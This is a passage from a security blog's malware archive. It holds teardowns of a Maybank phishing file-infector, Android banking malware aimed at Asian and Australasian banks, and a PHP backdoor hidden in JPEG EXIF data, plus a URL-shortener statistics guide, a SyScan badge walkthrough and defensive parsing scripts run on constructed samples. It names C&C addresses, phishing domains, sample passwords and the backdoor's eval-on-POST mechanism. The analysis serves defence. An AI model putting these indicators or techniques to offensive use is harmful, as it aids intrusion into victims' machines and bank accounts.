Category Archives: Malware

[ Technical Teardown: Maybank Phishing Malware – Part 1 ]

Recently, Jacob discovered two interesting phishing websites, http://maybankk2u[dot]com and http://maybank2u-my[dot]com. The two sites carried identical code, and both came with a piece of malware embedded in the page.

The malware we discovered is a file infector. It scans the system for .html, .exe and autorun.inf files and inserts malicious code into them.

[ Sample used in the analysis ]
MD5: 44A604F9D96368A83DF55E19644321D3
SHA256: CDBF41310DAE6EFF1127BB92A217369FD2F90B37896568D4F34528AC20468B5C
Malware Sample: index page
Password is “infected29A”

[Backdoor Analysis]
A brief high-level overview of the malware's infection process flow.

Figure 1 – Infection process

[ Initial Exploitation ]
The backdoor is dropped onto the victim's machine by a malicious VBScript embedded in the phishing home page.


Figure 2 – Maybank Phishing homepage

[ VBScript analysis ]
Scrolling down the HTML source of the page, you will come across a large chunk of hexadecimal text. Look closely at the start of this chunk and you will see the bytes 4D 5A (the 16-bit value 0x5A4D when read little-endian), which is "MZ" in ASCII. A file that starts with an MZ header is a DOS/PE executable. You may refer to http://wiki.osdev.org/PE for more information about the PE format.

To extract the payload you can either run the VBScript (which I don't recommend) or simply copy the entire hexadecimal wall of text into a hex editor, paste it as hex, and save the result as a .exe file.
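One way to automate the carve, as an added example that is not part of the original post: the script below pulls every long run of hex digits out of the page, checks for an MZ header whose e_lfanew lands on a "PE\0\0" signature (a bare "4D5A" hit is not enough on its own; hex dumps and random data produce those), and records the machine type, link timestamp and SHA-256 the way you would for a sample. The HTML it runs on is constructed around a 128-byte header stub, not the real phishing page or sample.

```python
"""Carve the hex-encoded executable out of the phishing page.

Added example (not the phishing page's or the author's code). The HTML below is
constructed: it embeds a 128-byte MZ/PE header stub built by build_fake_pe(), not
the real sample, so the script runs offline.
"""
import hashlib
import re
import struct
from datetime import datetime, timezone
from typing import List

# --- constructed sample ----------------------------------------------------------
def build_fake_pe(timestamp: int = 1202814140) -> bytes:
    """DOS header whose e_lfanew points at 'PE\\0\\0' + a COFF header (i386, given
    TimeDateStamp). 1202814140 is 2008-02-12 11:02:20 UTC, the compile time in the post."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 0, timestamp, 0, 0, 0, 0x0102)
    pe = b"PE\x00\x00" + coff
    return bytes(dos) + pe + bytes(64 - len(pe))               # pad to 128 bytes

SAMPLE_HTML = (
    "<html><body><h1>Welcome to Maybank2u</h1>\n"
    '<script language="VBScript">\n'
    'Dim payload\npayload = "' + build_fake_pe().hex().upper() + '"\n'
    "</script></body></html>\n"
)

# --- carver ------------------------------------------------------------------------
HEX_RUN = re.compile(r"[0-9A-Fa-f]{128,}")       # uninterrupted runs of hex digits

def is_pe(blob: bytes) -> bool:
    """True if blob starts with 'MZ' and e_lfanew points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 24 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def carve_hex_pe(text: str) -> List[bytes]:
    """Return every hex run in `text` that decodes to data with a valid PE header."""
    found = []
    for m in HEX_RUN.finditer(text):
        run = m.group(0).upper()
        idx = run.find("4D5A")                              # 'MZ' on a byte boundary
        while idx != -1 and idx % 2:
            idx = run.find("4D5A", idx + 1)
        if idx == -1:
            continue
        hexpart = run[idx:]
        if len(hexpart) % 2:
            hexpart = hexpart[:-1]                          # drop a dangling nibble
        blob = bytes.fromhex(hexpart)
        if is_pe(blob):
            found.append(blob)
    return found

def pe_info(blob: bytes) -> dict:
    """Machine, link timestamp (UTC) and SHA-256: what you record for a carved sample."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    machine, _nsections, ts = struct.unpack_from("<HHI", blob, e_lfanew + 4)
    return {
        "machine": machine,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat(),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }

if __name__ == "__main__":
    for i, blob in enumerate(carve_hex_pe(SAMPLE_HTML)):
        info = pe_info(blob)
        name = f"carved_{i}.exe_"                           # never save it as a runnable .exe
        with open(name, "wb") as fh:
            fh.write(blob)
        print(f"{name}: {len(blob)} bytes, machine=0x{info['machine']:04x}, "
              f"compiled={info['timestamp_utc']}, sha256={info['sha256']}")
```

Save the carved file with a non-executable extension and work on it inside the analysis VM only; the timestamp you get here is the linker's claim and, as the post notes later, can be forged.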


Figure 3 – MZ header spotted


Figure 4 – Dropping malware into temporary folder

When the VBScript is executed, it drops an executable into the target's temp folder. The file name is hard-coded; the author is probably trying to hide the malware in plain sight by reusing a common Windows executable name, svchost.exe.

The details of the executable extracted from the HTML are as follows:
SHA256: FD6C69C345F1E32924F0A5BB7393E191B393A78D58E2C6413B03CED7482F2320
VirusTotal Report: 50/54 (link); 2016-02-03 11:56:14 UTC
Compiled Date/Time: 2008-02-12 11:02:20
Packed: UPX

Let's unpack the malware with the UPX tool itself (upx -d).


Figure 5 –Unpacking using upx -d

The details of the unpacked malware are as follows:
SHA256: 876C5CEA11BBBCBE4089A3D0E8F95244CF855D3668E9BF06A97D8E20C1FF237C
VirusTotal Report: 44/54 (link); 2016-02-02 23:21:33 UTC
Compiled Date/Time: 2008-02-12 12:02:20+01:00 (the same instant as the 11:02:20 UTC timestamp above, shown by a different tool in a different timezone)

The malware camouflages itself as a BitDefender management console. Another interesting thing to note is that both the product version and the file version look like an IP address (106.42.73.61).


Figure 6 – Version fields that look like an IP address

[ Dynamic Analysis ]
Let's begin analyzing this piece of malware. The author used anti-reversing techniques to deter analysts, and static analysis in IDA Pro isn't of much use. Running it under Procmon, however, surfaces some interesting behaviour.


Figure 7 –New file dropped

As we can see from Figure 7, the malware writes a new executable to “C:\Program Files\Microsoft\DesktopLayer.exe“. After comparing the hashes of the newly dropped file with the original, I can conclude that the malware simply copied itself to the new location.


Figure 8 – Executing DesktopLayer.exe

After the file has been copied to the new location, a CreateProcess call (shown by Procmon as a Process Create event) launches the newly dropped executable, and the original process then terminates.


Figure 9 – Executing Default Browser

Analyzing DesktopLayer.exe in OllyDbg shows that the malware launches the default browser of the operating system, in this case IEXPLORE.EXE. On closer examination, the browser is created in a suspended state and the malware then writes its own code into the suspended IEXPLORE.EXE process with WriteProcessMemory. This technique is known as process hollowing. Once the malware has finished writing its code into the IEXPLORE.EXE process, it resumes the suspended thread, and the browser process runs the malware's code instead of its own.


Figure 10 – Mutex

Based on Figure 10, taken from the Process Explorer tool, we can observe that the malware uses a unique string (KyUffThOkYwRRtgPP) as its mutex.

It is also noted that the malware modifies the Userinit value under “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon“. Winlogon runs every executable listed in that value at logon, which is how the malware maintains persistence on the victim's machine.


Figure 11 – Persistent Registry Key

To get the actual malware code running inside IEXPLORE.EXE, we need to attach OllyDbg to the running process and dump it with the OllyDumpEx plugin.

The dumped process contains some interesting strings.


Figure 12 – Script Tags and Autorun?

There are some more interesting strings in the dump suggesting that there is an “antidote” for this virus. The dump also contains the mutex name and a domain name.


Figure 13 – Antidote is available

I am interested in using the antidote. Analyzing the injected process memory dump, we come to the following assembly code. To activate the “Antidot”, we just need to create the registry key “HKLM\Software\WASAntidot\disable“.


Figure 14 – Disable Malware

As shown in Figure 15, creating the registry key above stops the virus from mass-infecting files, and we even get a nice message box telling us that Antidot is activated.


Figure 15 – Antidot Activated

The malware loops through the folders on the victim's machine and edits every HTML file it comes across, inserting the same malicious code we found on the phishing website. It also attempts to infect suitable .exe files. Once an infected executable is run, a copy of the same malware is dropped and executed on the machine.

The malware also infects removable drives by editing autorun.inf and planting itself in the RECYCLER sub-folder. Better unplug your removable drives from the VM before you try analysing this!

The malware attempts to resolve a domain, fget-career.com. It also attempts to resolve google.com.


Figure 16 – DNS queries in Wireshark


Figure 17 – Spawning Shell

Once the malware reaches the fget-career.com URL, it can spawn a shell on the target machine and execute whatever commands it is given.


Figure 18 – Open port 4678

The malware also attempts to listen on port 4678.


Figure 19 – Port 4678 Opened

A common way to find infected or breached systems, and the one most AV vendors rely on, is scanning for indicators of compromise (IOCs): known (or suspicious) command and control (C&C) traffic on the network, and known-bad or suspicious artifacts on the hosts.

Based on our dynamic analysis, these are the IOCs we can use to scan our machines.

[ Host based Indicator ]

  1. Mutex – KyUffThOkYwRRtgPP
  2. File – C:\Program Files\Microsoft\DesktopLayer.exe
  3. File – %TEMP%\svchost.exe (an svchost.exe outside System32)
  4. Registry value – HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit (modified)
  5. Process – the default browser (e.g. IEXPLORE.EXE) running with no parent process
  6. File – C:\Program Files\Internet Explorer\complete.dat (default browser path)
  7. File – C:\Program Files\Internet Explorer\dmlconf.dat (default browser path)

[ Network based Indicator ]

  1. fget-career.com (DNS)
  2. User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  3. Listener on port 4678

[ Whois information ]

Domain Name: MAYBANKK2U.COM
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Sponsoring Registrar IANA ID: 1556
Whois Server: whois.west263.com
Referral URL: http://www.west.cn
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
Status: ok https://www.icann.org/epp#OK
Updated Date: 02-feb-2016
Creation Date: 02-feb-2016
Expiration Date: 02-feb-2017

IP Address:  207.226.137.64

Domain Name: MAYBANK2U-MY.COM
Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD.
Sponsoring Registrar IANA ID: 1556
Whois Server: whois.west263.com
Referral URL: http://www.west.cn
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
Status: ok http://www.icann.org/epp#OK
Updated Date: 02-feb-2016
Creation Date: 02-feb-2016
Expiration Date: 02-feb-2017

IP Address:  207.226.137.64


Once again, a network whois on the suspicious IP taken from the product version field (106.42.73.61) points back to China.

However, based on the analysis of the malware and on passive DNS and historical whois records from VirusTotal and who.is, the IP address from the product version field is quite likely a decoy meant to throw us off.

Another thing to note is that fget-career.com seems to be offline at the moment and its registration expires in March 2016. If we are interested in measuring how widespread the infection is, or in taking over the botnet, we could buy the domain when it lapses and sink-hole it with our own C&C server.

D O

[ Sharing ] Analysing and retrieving the Statistics from shortened URLs

I'm going to talk about how you can check whether other people have clicked on the same shortened URL as you.
This is also pretty useful if you want to know whether you are being targeted by a scam or a drive-by download, or are just one of many recipients.

The url which i’m going to test today is this:
http://www.dailychanges.com/

Let’s go through some of the URL shorteners and how we can get more info from these shortened URLs.
Bit.do
======
The original shortened link is http://bit.do/bKoMw
But if you append a “-” without the double quotes like this http://bit.do/bKoMw-
You will get to the statistics page for this shortened url.
It gives some important information about referrer sites, referrer pages and even visitor IPs.
This is probably dangerous if users are being targeted: the same statistics tell the sender who clicked.

Next we will talk about Is.gd
Is.gd
======
The original shortened link is http://is.gd/MyG7K6
However, if users want to look at the statistics, they can simply change the url to something like the one below.
http://is.gd/stats.php?url=MyG7K6

Next we will talk about
Goo.gl
======
The original shortened link is http://goo.gl/z8w84
But if you append a “+” (or “.info”) without the double quotes, like this: http://goo.gl/z8w84+ or http://goo.gl/z8w84.info
Once you go to the statistics pages, you will be redirected to something like this below.
https://goo.gl/#analytics/goo.gl/z8w84/all_time

Next we will talk about
Bit.ly
======
The original shortened link is https://bit.ly/1LsiFyY
But if you append a “+” without the double quotes, like this: https://bit.ly/1LsiFyY+
On the statistics page you can also check which other users have shared the exact same URL.
Please note that if the other user(s) added Google Analytics parameters to the URL, you might not see them on your statistics page, as a URL with different tracking parameters is a different link.

Next we will talk about
crop.is
=======
The original shortened link is http://crop.is/NV8
However, if users want to look at the statistics, they can simply change the url to something like the one below.
http://crop.is/NV8+

tiny.ph
=======
The original shortened link is http://tiny.ph/2mCe
In order to access the statistics, they can simply change the url to something like the one below.
http://tiny.ph/2mCe+

tny.im
=======
The original shortened link is http://tny.im/3Bm
In order to access the statistics, they can simply change the url to something like the one below.
http://tny.im/3Bm+

tiny.cc
=======
The original shortened link is http://tiny.cc/xtad8x
In order to access the statistics, they can simply change the url to something like the one below.
http://tiny.cc/xtad8x~

Then again, if there isn't any means to check the stats of a shortened URL,
always make sure to use an online service like http://longurl.org/ to expand it and confirm that it is not redirecting to some malicious URL.
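As an added example that is not part of this post: the rules above turned into a helper that derives the statistics URL for the shorteners listed, plus a redirect follower that does locally what longurl.org does for you. It walks the chain hop by hop with HEAD requests and reads only the Location header, so the destination page is never rendered. The redirect map used for the offline demo is constructed with made-up hosts.

```python
"""Find out where a shortened URL leads without opening the destination.

Added example, not from the post. stats_url() applies the suffix rules listed above;
follow_redirects() walks the redirect chain one hop at a time using only the Location
header, so nothing from the destination page is ever rendered. The fetcher is injectable:
SAMPLE_REDIRECTS is a constructed map (the hosts in it are made up) so the example also
runs offline.
"""
import urllib.error
import urllib.request
from typing import Callable, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

STATS_SUFFIX = {  # host -> character appended to the short link to reach its stats page
    "bit.do": "-", "goo.gl": "+", "bit.ly": "+", "crop.is": "+",
    "tiny.ph": "+", "tny.im": "+", "tiny.cc": "~",
}

def stats_url(short: str) -> Optional[str]:
    """Statistics page for a supported shortener, or None if we know no rule for it."""
    parts = urlsplit(short)
    host = parts.netloc.lower()
    host = host[4:] if host.startswith("www.") else host
    code = parts.path.strip("/")
    if not code:
        return None
    if host == "is.gd":                                   # is.gd uses a query instead
        return f"{parts.scheme}://is.gd/stats.php?url={code}"
    suffix = STATS_SUFFIX.get(host)
    return f"{parts.scheme}://{host}/{code}{suffix}" if suffix else None

Fetcher = Callable[[str], Tuple[int, Optional[str]]]

def live_fetch(url: str) -> Tuple[int, Optional[str]]:
    """HEAD request that does NOT follow redirects: returns (status, Location header)."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None                                   # make urllib raise instead
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, method="HEAD",
                                 headers={"User-Agent": "Mozilla/5.0 (redirect-check)"})
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:                 # 3xx lands here when not followed
        return err.code, err.headers.get("Location")

def follow_redirects(url: str, fetch: Fetcher = live_fetch, max_hops: int = 10) -> List[str]:
    """Return [url, hop1, ..., final]. Stops on a non-redirect status, a loop or
    max_hops, so a redirect loop or an endless chain cannot hang the check."""
    chain = [url]
    for _ in range(max_hops):
        status, location = fetch(chain[-1])
        if status not in (301, 302, 303, 307, 308) or not location:
            break
        nxt = urljoin(chain[-1], location)                # Location may be relative
        chain.append(nxt)
        if chain.count(nxt) > 1:                          # loop: stop here
            break
    return chain

# Constructed redirect map standing in for the network (made-up hosts)
SAMPLE_REDIRECTS = {
    "https://bit.ly/s_-c": (301, "http://landing.example/"),
    "http://landing.example/": (302, "/app.apk"),
    "http://landing.example/app.apk": (200, None),
    "http://loop-a.example/": (302, "http://loop-b.example/"),
    "http://loop-b.example/": (302, "http://loop-a.example/"),
}

def sample_fetch(url: str) -> Tuple[int, Optional[str]]:
    return SAMPLE_REDIRECTS.get(url, (404, None))

if __name__ == "__main__":
    for short in ("http://bit.do/bKoMw", "http://is.gd/MyG7K6", "http://tiny.cc/xtad8x"):
        print(f"{short} -> stats at {stats_url(short)}")
    print(" -> ".join(follow_redirects("https://bit.ly/s_-c", fetch=sample_fetch)))
    print(" -> ".join(follow_redirects("http://loop-a.example/", fetch=sample_fetch)))
```

A HEAD request still touches every host in the chain, so run this from a throwaway network position; what it avoids is executing the landing page's script or downloading the final file. The hop limit and loop check matter because some redirectors loop forever when the User-Agent is not a phone.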

I hope that readers will find all the information written here useful.

Have Phun
Jacob Soo

[ Technical Teardown: Malware Targetting Singapore Banks ]

[ Background ]
Originally I wanted to let one of the local students write about it, but he was busy with school, internship and solving challenges.
It's also been a very long time since we wrote any “Technical Teardown” on malware/exploits here.

I got hold of this particular malware sample just days after these two reports:
http://www.abs.org.sg/pdfs/Newsroom/PressReleases/2015/MediaRelease_20151201.pdf
http://www.channelnewsasia.com/news/singapore/50-smartphone-users-in/2308976.html

The Association of Banks in Singapore (ABS) released an advisory to alert consumers on malware targeting mobile banking customers in Singapore.
We hope this technical teardown might be interesting to some of you.

[ Sample used in the analysis ]
MD5: 76745CE873B151CFD7260E182CBFD404
SHA1: 0F7C012466157891C1D12ADDDD4DFA0B8291DD75
Malware Sample: 76745ce873b151cfd7260e182cbfd404
Password is “infected29A”

Since it's an Android malware, let's check the permissions it requests and further dissect it. Use apktool to decode the APK by running the following command:

Now let's take a look at the AndroidManifest.xml file; you should see the following, including the permissions requested by the APK.

As we can see from AndroidManifest.xml, it asks for quite a lot of permissions, and the app is probably obfuscated.

Looking at strings.xml and styles.xml, we can see that customised themes have been created for various banking applications.
This malware targets a number of banks by mimicking the authentic app and phishing the infected user for banking credentials, as shown below.
Figure 1 – Customised Themes

[ Junk Codes as Anti-Analysis? ]
It took me 20-30 minutes to realise that the author uses lots of junk code, possibly to deter people like me from reversing the malware.
Metadata such as strings and function names is also obfuscated, as shown in the image below.

Figure 2 – Junk Code with no useful functionality

Since the sample is heavily obfuscated, some of the things I usually look out for are calls like Base64.decode, loadDataWithBaseURL or sendTextMessage.

[ Revealing of Hidden Configuration Strings ]
So I did a quick grep and found that it does use “Base64.decode”, as shown below.
Figure 3 – Base64 encoded string

The following is the base64 string that I extracted from the malware.

After base64-decoding it, I got back the following strings.

As we can see, the decoded strings contain IP addresses and other interesting strings. We can also safely assume that the malware author uses “@” as a delimiter.
For better illustration, I replaced every “@” with a newline.

[ Assessment of Malware ]
We can see that the IP addresses are the C&C servers, communicating on port 34580.
http://37.235.48.177:34580/
http://46.108.39.12:34580/
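As an added example (not the post's own code), the grep above turned into a small parser: it pairs each const-string in the decoded smali with the Base64.decode call it feeds, decodes the blob with Android's tolerance for missing padding, splits on the “@” delimiter and picks out the C&C endpoints. The smali snippet it runs on is constructed; the two addresses in it are the ones found above, but the other config fields and the method are invented.

```python
"""Pull the Base64-encoded configuration out of decoded smali and parse it.

Added example, not the post's code. find_base64_args() pairs each const-string with the
Landroid/util/Base64;->decode call it feeds, which is the grep described above turned
into a parser; parse_config() splits the decoded blob on the "@" delimiter and picks
out the C&C endpoints. SAMPLE_SMALI is constructed: it carries the two C&C addresses
named in the post, but the other fields and the method are made up.
"""
import base64
import re
from typing import Dict, List

CONST_STRING = re.compile(r'const-string(?:/jumbo)?\s+(v\d+|p\d+),\s*"((?:[^"\\]|\\.)*)"')
B64_DECODE = re.compile(r"invoke-static\s+\{\s*(v\d+|p\d+)[^}]*\},\s*Landroid/util/Base64;->decode\(")
ENDPOINT = re.compile(r"^(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9.-]+\.[a-z]{2,})(?::(\d+))?/?$", re.I)

def b64decode_lenient(s: str) -> bytes:
    """Android's Base64.decode accepts missing padding; mirror that."""
    return base64.b64decode(s + "=" * (-len(s) % 4))

def find_base64_args(smali: str) -> List[str]:
    """Strings that reach Base64.decode(String, int): for each call, the last
    const-string loaded into the register passed as the first argument."""
    regs: Dict[str, str] = {}
    out = []
    for line in smali.splitlines():
        m = CONST_STRING.search(line)
        if m:
            regs[m.group(1)] = m.group(2)
            continue
        m = B64_DECODE.search(line)
        if m and m.group(1) in regs:
            out.append(regs[m.group(1)])
    return out

def parse_config(blob: bytes, delimiter: str = "@") -> Dict[str, List]:
    """Split the decoded config on the delimiter and classify each field."""
    fields = [f for f in blob.decode("utf-8", "replace").split(delimiter) if f]
    cfg: Dict[str, List] = {"c2": [], "other": []}
    for f in fields:
        m = ENDPOINT.match(f.strip())
        if m:
            cfg["c2"].append((m.group(1), int(m.group(2)) if m.group(2) else 80))
        else:
            cfg["other"].append(f)
    return cfg

# Constructed: the two C&C addresses are from the post, everything else is invented
CONFIG_PLAIN = "http://37.235.48.177:34580/@http://46.108.39.12:34580/@sms_gate@5"
SAMPLE_SMALI = f'''
.method private static a()[B
    .locals 2
    const-string v0, "{base64.b64encode(CONFIG_PLAIN.encode()).decode().rstrip("=")}"
    const/4 v1, 0x0
    invoke-static {{v0, v1}}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B
    move-result-object v0
    return-object v0
.end method
'''

def extract_c2(smali: str) -> List:
    """End-to-end: smali text -> list of (host, port) C&C endpoints."""
    endpoints = []
    for s in find_base64_args(smali):
        endpoints.extend(parse_config(b64decode_lenient(s))["c2"])
    return endpoints

if __name__ == "__main__":
    for host, port in extract_c2(SAMPLE_SMALI):
        print(f"C2 {host}:{port}")
```

Run it over the whole smali tree produced by apktool (concatenate the .smali files, or call find_base64_args per file) and every Base64 literal that reaches decode() comes out, not just the one you happened to grep first. If a string turns out to be fed through another transform before decode(), the register-tracking here will miss it; that is the moment to fall back to the debugger.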

Within the malware sample, we also found that it targets customers of the following banks.
Austria
=======

Dexia Kommunalkredit Bank
Bank Austria
Erste Bank und Sparkassen (Thanks to Alex Inführ for pointing out my mistake.)
RGB (Raiffeisen Banking Group)
George (https://mygeorge.at/)
DK (Deutsche Kreditbank AG)
Bawag (BAWAG P.S.K)

Australia
=========

Westpac
St George
Gomoney
National Australia Bank
Commbank

New Zealand
===========

Westpac
Bank of New Zealand
ANZ Bank New Zealand

Singapore
=========

DBS
OCBC
POSB

Hong Kong
=========

Citibank
Bank Of China
Hang Seng Bank
Breeze

I'll update this post later on how we can reverse such malware more easily.
In the meantime, I hope you enjoy reading it.

Happy Reversing,
Jacob Soo

[ Walkthrough : SyScan 2015 Badge Challenge ]

Two days ago, a few of us went to SyScan and completed the Badge Challenge put together by the SyScan crew.
Here is a short write-up of our experience with all of the puzzles, their solutions, and the steps to solve them.
Of course, @miaubiz gave us a huge clue for solving the last stage, and he also found the “Easter Egg” or “Debug Mode” in it.

Spoiler Alert: The following article is a detailed and methodical walk through of how to solve the challenge.
So please do take note and understand that this document contains MASSIVE spoilers!
If you’d rather try it for yourself, stop reading now and go and play NOW!

 

 

 

 

 

 

 

 

 

 

 

 

Still here?
Alright, lets go!

[ Stage 1 ]

One of the options we had when we powered up the badge was “Unlock 1”.
So we tried a bunch of inputs like “Open”, “Open Sesame” and “Open now God Damn It”, but we were always returned the following QR code.
IMG_0073
The above QR code decodes to: Try "Unlock"
So we thought, why not just try “Unlock”?

Surprisingly, we got back another QR code.
IMG_0075
This QR code decodes to “insufficient privilege”.
Initially, we thought that maybe we needed a special “username” before we could unlock this.
So we started brute-forcing all the possible “usernames” an “admin” might use.
All of these failed, until after the first tea break we tried “sudo unlock”, as shown in the image below.
IMG_20150328_012534288[1]
w00t h00t, we have successfully unlocked “Stage 1”.

[ Stage 2 ]
When we tried to unlock “Stage 2” using the same password as “Stage 1”, we got back something that looked like morse code.
IMG_20150328_012730132[1]
After decoding the morse code, we got back “ttall”.
We tried that but alas, it didn't work at all. Then Thomas gave everyone this clue: it's not full morse code.

We wondered whether it could be “--all”, since it sounds and looks like it.
So we entered “--all”, but that wasn't the key to “Stage 2”.
After another round of tea break, we wondered whether “--all” should be appended to the answer for “Stage 1”.
So we tried “sudo unlock --all”, and “Stage 2” was unlocked.

[ Stage 3 ]
For “Stage 3”, we saw a new option to choose, “Crypt-analysis”.
Selecting this option shows the following instruction.
IMG_0084

Our initial thought was, “Let's use Base32 to decrypt it”.
We tried, and it failed. We got past this when @miaubiz gave me a clue: “Try a bit-flipping technique, like +1 and -1 on each character.”
So we listened to his sagely advice and started brute-forcing with “Ask Oracle”.
For simplicity's sake, we tried the first two characters and saw this English-looking word.
IMG_0085

“srueamishossifrage” looked like an English word, so we started Googling for it but found no results… then we pondered for a while and realised it could be “squeamishossifrage”, and we found this page.
Hmmmm… “The Magic Words” and “Cipher” were found in that Wikipedia page.

So we tried “squeamishossifrage” and bingo, we solved it.
IMG_0086

[ Easter Egg or Debug Mode ]
@miaubiz found this interesting “Easter Egg”, or is it a “Debug Mode”? It bypasses “Stage 1” and “Stage 2” and goes straight to “Stage 3”. O_O

What @miaubiz did was take out the battery, push the joystick to the “Up” position and then re-insert the battery.
Next thing you know, the username is adm1n and you have reached “Stage 3”.

This “Easter Egg” is useful if you don't want to keep repeating the first two stages whenever your badge resets itself back to default.

Let me repeat this again. @miaubiz is a GENIUS.

Another thing we found, though we are still unclear what use it has, is the secret number in “Waste of Time”.

When you start the game, it shows “Game of Life”. One of us is very familiar with “Game of Life” and immediately found this secret number.
IMG_0064
Could “Godfather” Thomas Lim be giving us 8696 as the winning number for this week’s 4D? xDDD

We hope that this walkthrough is simple to understand. Please let us know if we did anything wrong in our process of solving this.

Well, all the guys here wished that the “Godfather” Thomas will organise another wonderful .SG conference in 2016 if there is no SyScan 2016….or will SyScan 2016 happen? xDDD

Happy Reversing,
Jacob, Damian & Glenn

[ Technical Analysis: Deceiving ‘Parked Domain’ & several .SG sites serves exploits ]

I reported the following Singapore websites, which may be serving malicious content, to SingCERT back on 29 November 2014.
I checked again today and all of these sites are still serving the same malicious content,
even though SingCERT told me on 1 December that they had notified all relevant parties. O_o”

For the 1st website, I happened to chance upon it while looking at Lego-related stuff.
Severity: Malware Hidden Inside JPG EXIF Headers
Confidence: Certain
Host: h–p://www[.]thebroerscafe[.]sg
Path: /wp-content/uploads/2013/05/Lego-workshop[.]jpg

Issue Description:
The malicious content hides its data in the EXIF headers of a JPEG image.
So how does content in the EXIF headers of a JPEG image get executed?
It relies on the PHP functions exif_read_data and preg_replace: the former reads the headers and the latter executes the code they contain.
If you view the EXIF info of the following image:
h–p://www[.]thebroerscafe[.]sg/wp-content/uploads/2013/05/Lego-workshop[.]jpg

You will see something like this.

Image 1 : Exif info of Malicious JPG file

If you open it in Notepad++ or a hex editor,
the code is hidden here, as shown in the image below.

Image 2 : Malicious JPG opened in Notepad++

Note the PHP code in the Model field, but also the string /.*/e in the Make field.
Once the base64 string is decoded, the code translates into:

Basically, it evaluates whatever it receives through the POST parameter zz1.
But this is an image; how does this code get executed?
Thanks to the PHP exif_read_data function:

preg_replace interprets the replacement string as PHP code because of the /e modifier on the pattern (the Make field in the EXIF data), which executes the eval code in the second EXIF field (Model). So basically this is a backdoor that executes any command inside the zz1 POST parameter. The /e pattern modifier was deprecated in PHP 5.5.0 and removed in PHP 7.0, which is good news: on a current PHP the second stage can no longer be triggered this way.

So this is a two-component backdoor: a JPEG file with malicious EXIF data, and a small piece of PHP code that reads and executes it.
That PHP snippet can easily be inserted into any other PHP file on the server and would probably go unnoticed.
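To check an image for this backdoor without an image library, here is an added example that is not part of the original post: a minimal JPEG segment walker and TIFF IFD0 reader that pulls out Make and Model and flags the tell-tale combination (a regex literal with the e modifier in Make, PHP in Model). The JPEG it inspects is constructed by build_exif_jpeg(); the inner zz1 payload is an approximation of the one described above, not the real file's contents.

```python
"""Parse EXIF Make/Model straight out of a JPEG and flag the preg_replace /e backdoor.

Added example, not from the post: a minimal JPEG segment walker plus TIFF IFD0 reader
(ASCII tags only) that needs no image library. build_exif_jpeg() produces a constructed
sample; SAMPLE_MODEL approximates the payload described above and is an assumption.
"""
import base64
import re
import struct
from typing import Dict, List

TAGS = {0x010F: "Make", 0x0110: "Model"}

def build_exif_jpeg(make: str, model: str) -> bytes:
    """Constructed JPEG: SOI, one APP1/Exif segment whose IFD0 holds Make and Model, EOI."""
    fields = [(0x010F, make.encode("latin-1") + b"\x00"),
              (0x0110, model.encode("latin-1") + b"\x00")]
    data_off = 8 + 2 + 12 * len(fields) + 4            # header + count + entries + next-IFD
    entries, data = b"", b""
    for tag, val in fields:
        if len(val) <= 4:                                # short values live inside the entry
            entries += struct.pack("<HHI4s", tag, 2, len(val), val.ljust(4, b"\x00"))
        else:                                            # long values are offset-addressed
            entries += struct.pack("<HHII", tag, 2, len(val), data_off + len(data))
            data += val
    tiff = (b"II*\x00" + struct.pack("<I", 8) + struct.pack("<H", len(fields))
            + entries + b"\x00\x00\x00\x00" + data)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"

def parse_ifd0_ascii(tiff: bytes) -> Dict[str, str]:
    """Read the ASCII tags we care about from IFD0 of a TIFF (Exif) blob."""
    order = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if order is None or struct.unpack(order + "H", tiff[2:4])[0] != 42:
        raise ValueError("not a TIFF header")
    ifd = struct.unpack(order + "I", tiff[4:8])[0]
    count = struct.unpack(order + "H", tiff[ifd:ifd + 2])[0]
    out: Dict[str, str] = {}
    for i in range(count):
        e = ifd + 2 + 12 * i
        tag, typ, n = struct.unpack(order + "HHI", tiff[e:e + 8])
        if tag not in TAGS or typ != 2:                  # 2 = ASCII
            continue
        if n <= 4:
            raw = tiff[e + 8:e + 8 + n]
        else:
            off = struct.unpack(order + "I", tiff[e + 8:e + 12])[0]
            raw = tiff[off:off + n]
        out[TAGS[tag]] = raw.rstrip(b"\x00").decode("latin-1")
    return out

def exif_make_model(jpeg: bytes) -> Dict[str, str]:
    """Walk JPEG marker segments until the APP1/Exif segment (or SOS) and parse it."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                       # EOI / start of scan: no more headers
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:     # stand-alone markers carry no length
            pos += 2
            continue
        seglen = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
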